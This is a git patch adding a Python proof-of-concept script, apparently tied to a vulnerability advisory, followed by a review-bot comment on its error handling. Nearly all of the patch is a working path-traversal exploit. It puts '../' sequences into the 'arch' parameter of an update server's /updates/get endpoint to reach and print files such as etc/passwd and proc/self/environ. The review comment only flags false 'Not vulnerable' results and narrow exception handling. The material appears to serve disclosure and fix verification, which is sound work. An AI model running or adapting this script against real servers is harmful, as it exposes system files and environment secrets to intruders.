From f26d905664003a94a4f80fbd6111d2124b8bd91e Mon Sep 17 00:00:00 2001
From: hugy
Date: Fri, 29 May 2026 07:09:29 +0000
Subject: [PATCH] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20rosetta-sdu-2026-0000/poc1.py?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
rosetta-sdu-2026-0000/poc1.py | 42 +++++++++++++++++++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 rosetta-sdu-2026-0000/poc1.py
diff --git a/rosetta-sdu-2026-0000/poc1.py b/rosetta-sdu-2026-0000/poc1.py
new file mode 100644
index 0000000..076f3f4
--- /dev/null
+++ b/rosetta-sdu-2026-0000/poc1.py
@@ -0,0 +1,42 @@
+import sys
+import json
+from urllib.request import urlopen
+from urllib.error import URLError
+
+url = sys.argv[1] if len(sys.argv) > 1 else "http://UPDSRV:8080"
+url = url.rstrip("/")
+
+targets = [
+ "etc/hostname",
+ "etc/passwd",
+ "proc/1/cmdline",
+ "proc/self/environ",
+ "proc/cpuinfo",
+]
+
+for depth in range(1, 11):
+ up = "/".join([".."] * depth)
+ for target in targets:
+ arch = f"{up}/{target}"
+ params = f"platform=android&arch={arch}&app=1.0.0&kernel=0.0.0"
+ try:
+ with urlopen(f"{url}/updates/get?{params}", timeout=5) as resp:
+ data = json.loads(resp.read())
+ except (URLError, ValueError):
+ continue
+
+ update_needed = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
+ kernel_url = data.get("kernelUrl") or data.get("kernel_url")
+
+ if update_needed and kernel_url and ".." in kernel_url:
+ print(f"Found: {kernel_url}")
+ try:
+ with urlopen(url + kernel_url, timeout=5) as f:
+ content = f.read().decode("utf-8", errors="replace")
+ print(content[:1000])
+ except URLError:
+ print("Failed to download file.")
+ sys.exit(0)
+
+print("Not vulnerable")
+sys.exit(1)
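Review bot: The closing `print("Not vulnerable")` / `sys.exit(1)` is reached whenever every request fell into `except (URLError, ValueError): continue`, so an unreachable or mistyped server address is reported exactly like a patched one. Anyone running this to confirm a fix would get a false all-clear; record that at least one response parsed (`responded = True` right after `json.loads(...)`) and finish with a separate outcome such as `if not responded: sys.exit(2)` ahead of the "Not vulnerable" line. The handler is also narrower than the failures it can meet: a read timeout or reset inside `resp.read()` raises `OSError` subclasses that are not `URLError`, and a JSON body that is not an object makes `data.get` raise `AttributeError`, so `except (OSError, ValueError):` together with an `isinstance(data, dict)` check would keep the loop from aborting with a traceback. Indentation is lost on this page, so the nesting of `sys.exit(0)` relative to the `if` and the inner `try` is inferred rather than visible.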